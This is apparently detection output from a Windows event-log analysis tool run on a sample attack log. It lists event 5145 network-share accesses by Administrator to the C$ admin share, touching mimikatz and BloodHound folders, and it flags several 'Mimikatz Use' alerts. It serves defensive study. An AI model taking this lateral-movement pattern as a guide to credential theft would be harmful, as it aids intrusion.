+09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\mimikatz_trunk\Win32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\mimikatz_trunk\x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Music\Sample Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Music\Sample Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Pictures\Sample Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Pictures\Sample Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Videos\Sample Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Videos\Sample Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Recorded TV : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Recorded TV\Sample Media\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Recorded TV\Sample Media : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\locales : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 